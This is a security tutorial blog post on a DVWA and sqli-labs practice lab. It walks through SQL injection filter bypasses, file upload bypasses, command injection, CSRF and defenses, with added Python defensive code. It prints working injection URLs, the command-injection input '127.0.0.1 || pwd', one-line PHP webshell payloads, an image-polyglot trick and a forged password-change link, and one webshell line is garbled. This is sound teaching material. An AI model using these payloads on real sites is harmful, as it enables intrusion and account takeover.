Detailed explanation of SQL injection - security (Part 2)

If there are any errors in this article or you have any suggestions, please feel free to contact me, thank you!
Preface: following the initial SQL injection study of the previous two days, this post continues the practice in the Metasploitable Linux environment.
1. Having learned SQL injection, we naturally need to prevent it. Because web injection is so harmful, defensive technologies have appeared one after another:

1. Programmers deliberately build defenses into their code, or run security tests, to block web injection.
2. Hardware or software WAF products from the major security vendors.

Blacklist filtering technology

1. Filtering common keywords in SQL key fields: and, or, union all select, quotation marks, spaces, etc. Some related techniques do not filter but instead use escape functions or strip the illegal keywords.

Bypass method:

  1. Case distortion (id=-1 UniOn sEleCt 1,2,3...)
  2. Encoding: hex encoding, urlencode
  3. Comments (/**/)
  4. Keyword replacement (and -> &&, or -> ||)
  5. Truncation
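As an added illustration of why the blacklist approach above is fragile, the Python below (not from the original post) runs a literal-keyword filter and a normalizing filter over constructed inputs modelled on the variants just listed, and then shows the real fix: binding the value as a query parameter so it is never spliced into the SQL string. The table and sample inputs are constructed for the example.

```python
import re
import sqlite3
from urllib.parse import unquote_plus

# Constructed sample inputs modelled on the variants listed above.
SAMPLES = {
    "benign": "1",
    "plain": "-1' union all select 1,2,database()--",
    "case": "-1' UniOn aLl SeLeCt 1,2,3--",
    "encoded": "-1%27%20UNION%20SELECT%201%2C2%2C3--",
    "replaced": "-1' && 1=1--",
}

KEYWORD_RE = re.compile(r"\b(union|select|and|or)\b")

def naive_filter_allows(value: str) -> bool:
    """Case-sensitive literal match, the way a weak blacklist works."""
    return KEYWORD_RE.search(value) is None

def normalized_filter_allows(value: str) -> bool:
    """Decode, lower-case and strip comments first, then match whole words.
    Word boundaries avoid the false positive on words like 'information'."""
    text = unquote_plus(value).lower()
    text = re.sub(r"/\*.*?\*/", " ", text)  # drop /**/ used in place of spaces
    if KEYWORD_RE.search(text) or "&&" in text or "||" in text or "--" in text:
        return False
    return True

def make_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for the lab database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [(1, "admin"), (2, "bob")])
    return conn

def lookup_user(conn: sqlite3.Connection, user_id: str) -> list:
    """The actual fix: a parameterized query. The placeholder is bound as data,
    so the whole payload is compared against id and matches nothing."""
    return conn.execute(
        "SELECT id, username FROM users WHERE id = ?", (user_id,)
    ).fetchall()
```

Even the normalizing filter is only a detection aid; the parameterized query is what removes the injection.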

2. File upload vulnerability

When we use the Internet we constantly use file upload functions: uploading an avatar, a document, a video and so on. We know this is a normal function, but have you ever considered how the server processes or parses these files after they are uploaded? If the server is not careful when handling uploaded files, security incidents follow, such as:

  (1) Uploading a web script file that the server then executes
  (2) Uploading a Trojan file to induce users or administrators to download it
  (3) Uploading phishing files
  (4) Uploading fraudulent documents

File upload vulnerability core

For a file upload attack to be successful, two elements must generally be met:

  (1) The webshell file can be successfully uploaded to the server
  (2) The file can be parsed by the server, or the uploaded file can be accessed

Implementing the core - upload bypass technology

Generally speaking, the detection techniques encountered when uploading files are:

  (1) Client-side JavaScript detection (usually checking the file extension)
  (2) Server-side MIME type detection (checking the Content-Type value)
  (3) Server-side directory path detection (checking the path parameter)
  (4) Server-side file extension detection (checking the file extension)
  (5) Server-side file content detection (checking whether the content is legal or contains malicious code)

Client-side detection bypass (JavaScript detection)

This type of detection consists of JavaScript on the upload page that checks the file before it is sent, most commonly whether the extension is allowed. Because it runs in the browser, the bypass is very simple.
Method: Create a webshell file (such as shell.php) -> rename it to an allowed extension (shell.png) -> intercept the request in Burp and change the name back to shell.php -> upload

Server-side detection bypass (MIME type detection)

This detection runs on the server, and the main check is the Content-Type value (whitelist or blacklist). Since the client supplies that value, this bypass is also simple.
Method: Create a webshell file (such as shell.php, Content-Type: text/plain) -> intercept in Burp and change it to Content-Type: image/gif -> upload

Server detection bypass (directory path detection)

This detection runs on the server and generally checks whether the path is legal, but it has no defense against slightly unusual names. For example, shell.php[\0].png or 123.php0x00.png, where 0x00 is the string terminator in C and in PHP's underlying C functions: when the server reads the name and reaches [\0] after shell.php, it stops there and treats the file as shell.php. The POST form of the same trick is shell.php%00.png.
Note: To bypass the back-end check you only need to give it the extension it wants and then cut off the real suffix.

Server-side detection bypass (file extension detection)

As the name implies, it checks the file extension, usually through whitelist and blacklist defense.

1. Blacklist: for example, the extension may not contain html, php, php3, php4, asp, exe, bat or jsp. Combined with file-name case tricks, names such as AsP or pHp can get past a blacklist check.

  (1) List bypass: use an extension that is not on the blacklist, such as asa or cer.
  (2) Special file names: change the file name in the HTTP request to test.asp. or test.asp_ (the underscore stands for a space). Windows does not allow such names, so they have to be set in Burp or a similar tool. After the check passes, Windows automatically removes the trailing dot or space. Note that Unix/Linux systems do not do this.
  (3) .htaccess attack combined with list bypass: upload a custom .htaccess and various checks can be bypassed easily.
  (4) Parser call/vulnerability bypass: upload a file with a non-blacklisted extension that has code injected into it, then use the parser call/vulnerability.

2. Whitelist detection. A whitelist is safer than a blacklist, but still not absolutely safe.

(1) 0x00 truncation bypass

Use test.asp%00.jpg to truncate: the name ends in a whitelisted extension, and the flaw in the server code's detection logic does the rest. At present, I have only encountered this vulnerability in asp programs. Combined with parser call/vulnerability bypass: upload a whitelisted file with code injected into it directly, then use the parser call/vulnerability.

(2) .htaccess file attack

The move_uploaded_file section of the PHP manual carries the warning: 'If the destination file already exists, it will be overwritten.' If PHP is not configured securely, move_uploaded_file can be used to overwrite the server's .htaccess file with your own, after which the parsing rules can be defined arbitrarily.

Server-side detection bypass (file content detection)

If file content detection is configured strictly, an upload attack becomes very difficult. It can be called the last line of detection at the code layer: if it is broken, then even with no vulnerability in the code layer there is an opportunity to exploit a parsing vulnerability in the application layer later.

(1) Magic number check: this inspects the magic number at the start of the file content. The values to satisfy it are:

  jpg: FF D8 FF E0 00 10 4A 46 49 46
  gif: 47 49 46 38 39 61
  png: 89 50 4E 47

(2) File-related information detection

The getimagesize() function is commonly used to check image file information. It is enough to forge the file header, that is, to add some image information on top of the magic number. The result looks roughly like this:

GIF89a

(...some binary data for image...)
 <?php phpinfo(); ?>
(... skipping the rest of binary data ...)

(3) File loading detection

This is the most demanding form of detection. It generally calls an API or function to actually load the file; the most common is an image rendering test, and the strictest variants even re-render the image (secondary rendering). Against a rendering/loading test, the attack is code injection bypass; against secondary rendering, the attack targets the file loader itself.
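To show what a server-side upload check that resists the bypasses described in this section looks like, here is an added Python validator (not code from the original post or from DVWA). It rejects NUL truncation, normalises Windows trailing dots and spaces, whitelists only the last extension, requires Content-Type and magic number to agree, refuses script markers in image bodies, and stores under a server-chosen name. The allowed list and sample bodies are constructed for the example.

```python
import secrets

# Whitelist: extension -> (magic number prefix, expected Content-Type).
# Values follow the magic numbers quoted in the text; JPEG is shortened to
# its first three bytes so both JFIF and Exif files pass.
ALLOWED = {
    "png": (b"\x89PNG", "image/png"),
    "gif": (b"GIF8", "image/gif"),
    "jpg": (b"\xff\xd8\xff", "image/jpeg"),
    "jpeg": (b"\xff\xd8\xff", "image/jpeg"),
}

def validate_upload(filename: str, content_type: str, data: bytes):
    """Server-side upload check. Returns (ok, reason, name_to_store)."""
    # 1. Truncation and path tricks: a NUL or separator in the name is an
    #    immediate reject, before the name reaches any C string or path call.
    if "\x00" in filename or "/" in filename or "\\" in filename:
        return False, "illegal character in filename", None
    # 2. Windows strips trailing dots/spaces ('test.asp.'), so normalise the
    #    name the same way before deciding what the extension is.
    base = filename.rstrip(". ")
    ext = base.rsplit(".", 1)[-1].lower() if "." in base else ""
    # 3. Whitelist the last extension only; '.htaccess' yields 'htaccess'
    #    and 'shell.php' yields 'php', neither of which is listed.
    if ext not in ALLOWED:
        return False, "extension not in whitelist", None
    magic, mime = ALLOWED[ext]
    # 4. The client-supplied Content-Type must agree with the extension.
    if content_type != mime:
        return False, "Content-Type does not match extension", None
    # 5. Magic number check on the bytes actually received.
    if not data.startswith(magic):
        return False, "magic number mismatch", None
    # 6. A magic number is trivial to prepend, so also refuse script markers
    #    in the body. Re-encoding the image (secondary rendering) is stronger.
    if b"<?" in data or b"<script" in data.lower():
        return False, "script marker inside image", None
    # 7. Never reuse the client's name: a server-chosen random name defeats
    #    double extensions and .htaccess overwrites alike.
    return True, "ok", f"{secrets.token_hex(16)}.{ext}"

# Constructed sample bodies: a minimal GIF header, and the same header
# followed by the PHP tag quoted in the text above.
GIF_CLEAN = b"GIF89a" + bytes(16)
GIF_WITH_PHP = b"GIF89a" + bytes(8) + b"<?php phpinfo(); ?>" + bytes(8)
```

The stored name should additionally land in a directory the web server serves as static files only, which the validator itself cannot enforce.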

3.

1. (1) Copy the corresponding URL below, click Load URL, and then click Execute


(2) Close the quote in the injected string and get the database name, dvwa. Then follow the earlier routine; this time the system reports an error. The error message is as follows



The system automatically adds a \ before the quote, which means the quote in our constructed string is being escaped and the statement breaks. We need to avoid giving the system a special character to escape. Here, hex encoding can be used to convert the string dvwa to hexadecimal (0x...), so that no single quote appears in the constructed statement. The system then has nothing to escape and the statement is no longer broken.

(3) Similarly, use the SQL statement used previously to extract the data.

2. Take Less-25 as an example

(1)

http://192.168.122.130/sqli-labs-master/Less-25/?id=-1' union all select 1,2,database()--+ //Close the quote according to the echo and dump database()

(2)

http://192.168.122.130/sqli-labs-master/Less-25/?id=-1' union all select 1,table_name,column_name from infoorrmation_schema.columns where table_name = table_name and table_schema = database()--+ //Expose table name table_name, column name column_name

(3)

http://192.168.122.130/sqli-labs-master/Less-25/?id=-1' union all select 3,2,id from emails--+ //Dump the data

Summary: First we repeatedly construct inputs that close the quote and observe the echo. We find that the system filters the string "and" and the "+" character (+ decodes to a space in a URL).

We then reason that we can use mixed case, split or discontinuous "and"/"or", or other characters in place of and (such as &&; the aim is the same as and), or hex or urlencode conversions. The same applies to the string "or", including "or" appearing inside a word (such as information). The key is to get past the system's filtering and still achieve the intended effect.

3. Take Less-26 as an example

The "and" filtering is the same as in Less-25. For the spaces that are filtered out, %20 (a space), the encoding of the TAB key, or the encoding of the newline key can be used instead.

4. Take http://192.168.122.130/DVWA-1.9/vulnerabilities/exec/ as an example. The interface is as follows; it is a ping interface.

This interface has a vulnerability: a shell connector symbol lets other commands run together with the ping. When you enter 127.0.0.1 || pwd in the input box, the following happens

The current working directory appears in the page, and this vulnerability can then be used to obtain other data. Here we mention the "One Sentence Trojan"

echo '<?php @eval($_POST[123]);?>' > 123.php

Sometimes, to keep the victim from noticing, the "one-sentence Trojan" is combined with other forms, such as:

 <?php fputs(fopen("345.php","w")),<?php @eval($_POST[1234]);?>' >1234.php
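The fix for the ping interface above, as an added example (not DVWA's own code): accept only a literal IP address and invoke ping in list form without a shell, so a connector such as || is rejected as part of the address rather than interpreted. The helper names are assumptions for this example.

```python
import ipaddress
import subprocess

def parse_ping_target(target: str):
    """Accept only a literal IPv4/IPv6 address; return it, or None if invalid."""
    try:
        return ipaddress.ip_address(target.strip())
    except ValueError:
        return None

def build_ping_command(target: str) -> list:
    """argv for ping. Raises ValueError for anything that is not an address,
    so an input like '127.0.0.1 || pwd' never reaches a shell at all."""
    addr = parse_ping_target(target)
    if addr is None:
        raise ValueError(f"not an IP address: {target!r}")
    return ["ping", "-c", "1", str(addr)]

def run_ping(target: str) -> str:
    """List-form subprocess call: no shell, so ||, ; and && are plain text."""
    result = subprocess.run(build_ping_command(target), capture_output=True,
                            text=True, timeout=10, check=False)
    return result.stdout + result.stderr
```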

4. Combining File Inclusion and File Upload to Implement Attack

(1) Set the DVWA security level to Low at http://192.168.122.130/DVWA-1.9/security.php
Then use File Upload to upload a .php file containing the one-sentence Trojan, add the known upload path in China Chopper, and obtain the full directory listing. At this point files can be modified, deleted, uploaded and so on. (Sometimes the check can be bypassed by renaming the file to 123.png0x00.php, where 0x00 marks the end of the name.)

Use China Chopper to add the following code: echo '<?php @eval($_POST[123]);?>' > 123.php

Then you can get the directory through China Chopper as follows:

(2) Set the DVWA security level to Medium at http://192.168.122.130/DVWA-1.9/security.php
At this level, uploading a .php file returns an error and the upload fails, so we change the Trojan file to a format the upload accepts; the Trojan sits inside a png file, which is the example used here.


Manually set browser proxy



Start Burp, intercept the upload request and rename the file inside it.


Then choose Action -> Send to Repeater and click Go in Repeater. In the right-hand window you will see that the file has been uploaded. Open China Chopper and access it as in the previous steps.

(3) Select DVWA security as High at http://192.168.122.130/DVWA-1.9/security.php

First, if the picture uploads successfully, the picture must have been prepared in advance (the one-sentence Trojan added to it). That is, open the picture in a hex editor such as WinHex, add the one-sentence Trojan, and save a new picture.

Alternatively, use the cmd command: copy 1.png/b+123.php /a TCP.png. Here 1.png is a normal picture and 123.php is the one-sentence Trojan; they are combined into a new picture named TCP.png, which is then uploaded successfully (cmd was used above).

After the image is uploaded it cannot be intercepted and renamed as at the Medium level; there must be corresponding security processing on the web server side.
At this point it has to be triggered manually (or we wait for the administrator of the attacked system to open the picture). Once triggered, China Chopper can be opened in the same way to obtain the directory.

5. Ideas for dealing with some unusual levels:

Compare what changes and what does not between the file before and after upload (by inspecting binary differences), then modify the uploaded data accordingly to achieve the intended effect.
Some other attack methods:

  1. Take http://192.168.122.130/DVWA-1.9/vulnerabilities/upload/ as an example. Write a trigger instruction into the picture; when the administrator runs a command, the picture is processed and the code it contains is executed. In other words, a commonly used trigger instruction is buried in advance.
  2. Find the location of the system's default temporary file storage and change the file content there (for example, add an executable file containing the one-sentence Trojan) to achieve the desired effect.
  3. A system that automatically renames uploaded files prevents us from executing the non-executable file we uploaded. In that case, because the device has a limited capacity for processing files, the same file can be sent many times per second so that the back end does not have time to rename one or two of them. If we can then reach such a file, it can be executed.

6. CSRF: Cross-Site Request Forgery (using the cookie value)

Construct a URL, trick the victim into clicking the link, and the victim's own cookies are used to change the password without the victim's knowledge

http://192.168.122.130/DVWA-1.9/vulnerabilities/csrf/?password_new=1234&password_conf=1234&Change=Change#

For example, an attacker logs in to a website with his own account, opens the password change page and constructs a password change URL. When he wants to attack, he induces a victim (who has previously logged in to the website in a browser and still has cookies stored there) to click the prepared URL, and the password is changed without the victim's knowledge. The attacker knows the new password, so if the attack succeeds he can log in to the website as the victim with the password he put in the URL and perform a series of operations.

Some current defenses:

1. A verification code (CAPTCHA) can be required for the action.

2. Require the original password in order to change the password.

3. Referrer policy: no-referrer-when-downgrade

Linking from one website to another generates a new HTTP request. Referer is a field in the HTTP request that indicates where the request came from.
no-referrer-when-downgrade means that when the https protocol is downgraded to http, no referrer is sent to the server of the linked website; otherwise the server can use the Referer to check where a request originated.

4. An anti-forgery token, unlike a cookie, can block most CSRF attacks: each user has an anti-forgery code that others cannot guess, and a password change only succeeds if it carries the user's own token. The token must be unpredictable and preferably encrypted.
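The following is an added Python sketch (not DVWA's code) of a password-change handler that applies defenses 2, 3 and 4 above: it issues an unguessable per-session token, compares it in constant time, refuses requests whose Referer/Origin points to another site, and demands the current password. The session and user store are constructed stand-ins, and the site origin is the lab address from the text.

```python
import hmac
import secrets

# Constructed stand-ins: a user store and the site's own origin. Real code
# keeps a password hash, not the password; the plain value is only for the demo.
USERS = {"alice": "old-pass"}
SITE_ORIGIN = "http://192.168.122.130"

def issue_csrf_token(session: dict) -> str:
    """Defense 4: an unguessable per-session token, stored server-side and
    embedded in the form; a URL prepared in advance cannot contain it."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token

def change_password(session: dict, form: dict, headers: dict):
    """Handler for the password-change request. Returns (status, message)."""
    user = session.get("user")
    if user not in USERS:
        return 401, "not logged in"
    # Token comparison in constant time; reject if absent or different.
    expected = session.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected, form.get("csrf_token", "")):
        return 403, "missing or invalid CSRF token"
    # Defense 3: a request arriving from another site is refused.
    source = headers.get("Origin") or headers.get("Referer") or ""
    if source and source != SITE_ORIGIN and not source.startswith(SITE_ORIGIN + "/"):
        return 403, "cross-site request"
    # Defense 2: the current password must be supplied to change it.
    if form.get("password_current") != USERS[user]:
        return 403, "current password incorrect"
    new = form.get("password_new")
    if not new or new != form.get("password_conf"):
        return 400, "new passwords do not match"
    USERS[user] = new
    # Rotate the token so the same submitted form cannot be replayed.
    issue_csrf_token(session)
    return 200, "password changed"
```

A request built from the URL in the text carries no token, so it fails at the token check even when the victim's cookies are sent.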

The above is the detailed SQL injection security integration introduced by the editor. I hope it will be helpful to everyone. If you have any questions, please leave me a message and the editor will reply to you in time. I would also like to thank everyone for their support of the 123WORDPRESS.COM website!
